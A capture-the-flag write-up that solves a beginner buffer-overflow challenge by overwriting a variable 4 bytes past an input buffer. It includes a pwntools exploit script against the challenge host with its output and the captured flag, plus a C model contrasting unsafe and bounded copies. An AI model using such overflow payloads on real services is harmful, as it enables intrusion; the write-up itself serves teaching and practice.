
Observation

Open the file in IDA and look at the main function:

[image omitted: image-20250512100202857]

Look at sub_400686():

[image omitted: image-20250512100301717]

In other words, if we can satisfy the if condition, we get the flag.

Look at where unk_601068 and dword_60106C are located (just click on the two variables):

[image omitted: image-20250512100457261]

Their addresses differ by only 4 bytes.

Exploit

What we need to do is send a piece of data with the following structure:

```python
payload = b"AAAA" + p32(1853186401)
```

First fill the 4 bytes that separate the two variables, then overwrite the original contents of dword_60106C with the value the if check requires; after that the flag is printed directly.
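To make the layout concrete, here is an added C model that is not part of the original writeup or the challenge binary. It assumes (as a constructed stand-in for the disassembly) a 4-byte buffer immediately followed by the 4-byte value the if check reads, and an oversized read length in the unsafe variant; the hardened variant bounds the copy by the buffer's own size so the neighbouring variable can no longer be reached. The struct name, the function names and the probe helper are all hypothetical, and the little-endian byte order matches the x86-64 target.

```c
#include <stddef.h>
#include <stdint.h>
#include <string.h>

/* Constructed model of the binary's data section (an assumption, not taken
 * from the page's disassembly): a 4-byte input buffer immediately followed
 * by the 4-byte value the if check compares against, mirroring the 4-byte
 * distance between unk_601068 and dword_60106C. */
struct bss_layout {
    unsigned char buf[4];   /* stands in for unk_601068 */
    uint32_t      target;   /* stands in for dword_60106C */
};
_Static_assert(offsetof(struct bss_layout, target) == 4,
               "target must sit exactly 4 bytes past buf");

/* The constant the page's if check compares dword_60106C against. */
#define EXPECTED_VALUE 1853186401u   /* 0x6E756161 */

/* Unsafe variant: the read length exceeds the buffer (assumption: it covers
 * the neighbouring variable), so input bytes 4..7 land on 'target'.
 * Returns 1 if the if check would pass. */
int vulnerable_check(const unsigned char *input, size_t len)
{
    struct bss_layout s;
    memset(&s, 0, sizeof s);
    if (len > sizeof s)
        len = sizeof s;
    memcpy(&s, input, len);          /* overflow: spills past s.buf into s.target */
    return s.target == EXPECTED_VALUE;
}

/* Hardened variant: the copy is bounded by the buffer's own size, so no
 * input can reach 'target'; the check can only pass if the program itself
 * sets that value. */
int hardened_check(const unsigned char *input, size_t len)
{
    struct bss_layout s;
    memset(&s, 0, sizeof s);
    if (len > sizeof s.buf)
        len = sizeof s.buf;
    memcpy(s.buf, input, len);       /* cannot write beyond s.buf */
    return s.target == EXPECTED_VALUE;
}

/* Builds the same 8 bytes as b"AAAA" + p32(1853186401): 4 filler bytes,
 * then the value little-endian (61 61 75 6E). */
static void build_probe(unsigned char out[8])
{
    uint32_t v = EXPECTED_VALUE;
    memset(out, 'A', 4);
    for (int i = 0; i < 4; i++)
        out[4 + i] = (unsigned char)(v >> (8 * i));
}

/* Feed the 8-byte input to each variant and report the check's outcome. */
int probe_passes_vulnerable(void)
{
    unsigned char p[8];
    build_probe(p);
    return vulnerable_check(p, sizeof p);   /* 1: target overwritten */
}

int probe_passes_hardened(void)
{
    unsigned char p[8];
    build_probe(p);
    return hardened_check(p, sizeof p);     /* 0: target untouched */
}
```

The difference between the two variants is only the bound on the copy: once the read length is tied to the size of the buffer rather than to whatever follows it in memory, the 4-byte gap stops mattering and the comparison value is no longer under the sender's control.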

Exploit code:

```python
from pwn import *

# Connect to the challenge instance (host and port from the task)
r = remote("61.147.171.105", 59747)

# Read the two banner lines the program prints before it reads our input
res = r.recvline()
print(res)
res = r.recvline()
print(res)

# 4 bytes of filler to cover the gap after unk_601068, then the 4-byte
# little-endian value that lands on dword_60106C and satisfies the if check
payload = b"AAAA" + p32(1853186401)
r.sendline(payload)

# Read everything until the service closes the connection (the flag)
res = r.recvall()
print(res)

# [x] Opening connection to 61.147.171.105 on port 59747
# [x] Opening connection to 61.147.171.105 on port 59747: Trying 61.147.171.105
# [+] Opening connection to 61.147.171.105 on port 59747: Done
# b'~~ welcome to ctf ~~ \n'
# b'lets get helloworld for bof\n'
# [x] Receiving all data
# [x] Receiving all data: 0B
# [x] Receiving all data: 45B
# [+] Receiving all data: Done (45B)
# [*] Closed connection to 61.147.171.105 port 59747
# b'cyberpeace{7ffb977ba34907b01a6b6b74280a5921}\n'
```